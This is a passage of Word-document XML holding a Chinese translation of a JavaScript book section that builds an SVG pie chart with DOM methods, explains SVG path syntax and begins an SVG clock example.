      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，并在其中绘制一个饼状图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*data:</w:t>
      </w:r>
      <w:r>
        <w:t>用于绘制的数字类型的数组，数组每一项都表示饼状图的一个楔</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*width,height:SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形的大小，单位为像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*cx,cy,r:</w:t>
      </w:r>
      <w:r>
        <w:t>饼状图的圆心以及半径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*colors:</w:t>
      </w:r>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>颜色信息的数组，每种颜色代表饼状图每个楔的颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*labels:</w:t>
      </w:r>
      <w:r>
        <w:t>一个标签数组，该信息说明饼状图中每个楔代表的含义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*lx,ly:</w:t>
      </w:r>
      <w:r>
        <w:t>饼状图的左上角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>一个保存饼状图的＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>调用者必须将返回的元素插入到文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function pieChart(data,width,height,cx,cy,r,colors,labels,lx,ly){//</w:t>
      </w:r>
      <w:r>
        <w:t>这个是表示</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var svgns="http://www.w3.org/2000/svg";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，同时指定像素大小和用户坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var chart=document.createElementNS(svgns,"svg:svg");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart.setA</w:t>
      </w:r>
      <w:r>
        <w:t>ttribute("width",width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart.setAttribute("height",height);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart.setAttribute("viewBox","0 0"+width+""+height);//</w:t>
      </w:r>
      <w:r>
        <w:t>累加</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>的值，以便于知道饼状图的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++)total+=data[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>现在计算出饼状图每个分片的大小，其中角度以弧度制计算</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var angles=[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>.length;i++)angles[i]=data[i]/total*Math.PI*2;//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历饼状图的每个分片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>startangle=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>这里表示楔的结束位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var endangle=startangle+angles[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>计算出楔和圆相交的两个点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这些计算公式都是以</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>点钟方向为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>顺时针方向角度递增</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x1=cx+r*Math.sin(startangle);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var y1=cy-r*Math.cos(st</w:t>
      </w:r>
      <w:r>
        <w:t>artangle);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x2=cx+r*Math.sin(endangle);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y2=cy-r*Math.cos(endangle);//</w:t>
      </w:r>
      <w:r>
        <w:t>这个标记表示角度大于半圆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此标记在绘制</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>弧形组件的时候需要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var big=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(endangle-startangle</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Math.PI)big=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:path</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来描述楔</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是，使用</w:t>
      </w:r>
      <w:r>
        <w:t>createElementNS()</w:t>
      </w:r>
      <w:r>
        <w:t>来创建该元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>path=document.createElementNS(svgns,"path");//</w:t>
      </w:r>
      <w:r>
        <w:t>下面的字符串包含路径的详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d="M"+cx+","+cy+//</w:t>
      </w:r>
      <w:r>
        <w:t>从圆心开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"L"+x1+","+y1+//</w:t>
      </w:r>
      <w:r>
        <w:t>画一条到</w:t>
      </w:r>
      <w:r>
        <w:t>(x1,y1)</w:t>
      </w:r>
      <w:r>
        <w:t>的线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"A"+r+","+r+//</w:t>
      </w:r>
      <w:r>
        <w:t>再画一条半径为</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>的弧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"0"+big+"1"+//</w:t>
      </w:r>
      <w:r>
        <w:t>弧的详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x2+","+y2+//</w:t>
      </w:r>
      <w:r>
        <w:t>弧到</w:t>
      </w:r>
      <w:r>
        <w:t>(x2,y2)</w:t>
      </w:r>
      <w:r>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Z";//</w:t>
      </w:r>
      <w:r>
        <w:t>当前路径到</w:t>
      </w:r>
      <w:r>
        <w:t>(cx,cy)</w:t>
      </w:r>
      <w:r>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:path</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>path.setAttribute("d",d)</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>path.setAttribute("fill",colors[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置楔的颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>path.setAttribute("stroke","black");//</w:t>
      </w:r>
      <w:r>
        <w:t>楔的外边框为黑色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>path.setAttribute("stroke-width","2");//</w:t>
      </w:r>
      <w:r>
        <w:t>两个单位宽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart.appendChild(path);//</w:t>
      </w:r>
      <w:r>
        <w:t>将楔加入到饼状图中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当前楔的结束就是下一个楔的开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>startangle=endangle;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在绘制一些相应的小方块来表示图例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var icon=documen</w:t>
      </w:r>
      <w:r>
        <w:t>t.createElementNS(svgns,"rect");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("x",lx);//</w:t>
      </w:r>
      <w:r>
        <w:t>定位小方块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("y",ly+30*i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("width",20);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置小方块的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("height",20);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("fill",colors[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充小方块的颜色和对应的楔的颜色相同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("stroke",</w:t>
      </w:r>
      <w:r>
        <w:t>"black");//</w:t>
      </w:r>
      <w:r>
        <w:t>子外边框颜色也相同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.setAttribute("stroke-width","2");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart.appendChild(icon);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加到饼状图中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在小方块的右边添加标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var label=document.createElementNS(svgns,"text");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>label.setAttribute("x",lx+30);//</w:t>
      </w:r>
      <w:r>
        <w:t>定位标签文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>label.setAttribute("y",ly+30*i+18);//</w:t>
      </w:r>
      <w:r>
        <w:t>文本样式属性还可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>来设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>label.setAttribute("font-family","sans-serif");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>label.setAttribute("font-size","16");//</w:t>
      </w:r>
      <w:r>
        <w:t>在＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:text</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中添加一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>文本节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>label.appendChild(document.createTextNode(labels[i]));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart.appendChild(label);//</w:t>
      </w:r>
      <w:r>
        <w:t>将文本添加到饼状图中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return chart;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21-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码相对比较易懂。其中有个小的数学变换将数据转换</w:t>
      </w:r>
      <w:r>
        <w:t>成可绘制的饼楔角。但是，这些例子都是使用</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>代码来创建</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>元素并设置元素属性。为了在不完全支持</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器下也能正常工作，该例子使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>语法来处理</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>，使用</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间以及</w:t>
      </w:r>
      <w:r>
        <w:t>createElementNS()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法而不是</w:t>
      </w:r>
      <w:r>
        <w:t>createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述例子中最难懂的部分就是精确绘制饼楔的部分。每一个饼楔都使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:path</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来表示。该</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>元素可以描述由直线和曲线组成的任意形状。具体形状的描述是通过设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg:path</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>属性来实现的。该属性值使用简洁的语法：通</w:t>
      </w:r>
      <w:r>
        <w:t>过字母和数字来指定坐标、角度和其他的值。比如：字母</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>"move to"</w:t>
      </w:r>
      <w:r>
        <w:t>，同时指定要移动到的坐标（</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>）。字母</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>则表示</w:t>
      </w:r>
      <w:r>
        <w:t>"line to"</w:t>
      </w:r>
      <w:r>
        <w:t>，并绘制一条从当前位置到其后指定坐标的直线。上述例子还使用了字母</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>来绘制弧形。该字母之后需要指定</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>个数字值来描述要绘制的弧形。与之相关的详细信息在这里不重要，想要了解可以去参阅它的标准文档，</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/SVG/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>pieChart()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个包含饼状图描述信息的＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，但是，它并没有将该元素插入到文档中。因此，调用者需要</w:t>
      </w:r>
      <w:r>
        <w:t>手动将其插入到文档中。使用如下代码可以创建出如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t>所示的饼状图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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script src="PieChart.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body onload="document.body.appendChild(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pieChart([12,23,34,45],640,400,200,200,150,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>['red','blue','yellow','green'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>['North','South','East','West'],400,100));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"</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例</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t>是另外一个用脚本绘制</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形的例子：它使用</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>来绘制一个模拟时钟（参见图</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t>）。该例以一张内嵌在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面中的静态</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>时钟图片开始，而不是从零开始动态构造一棵</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
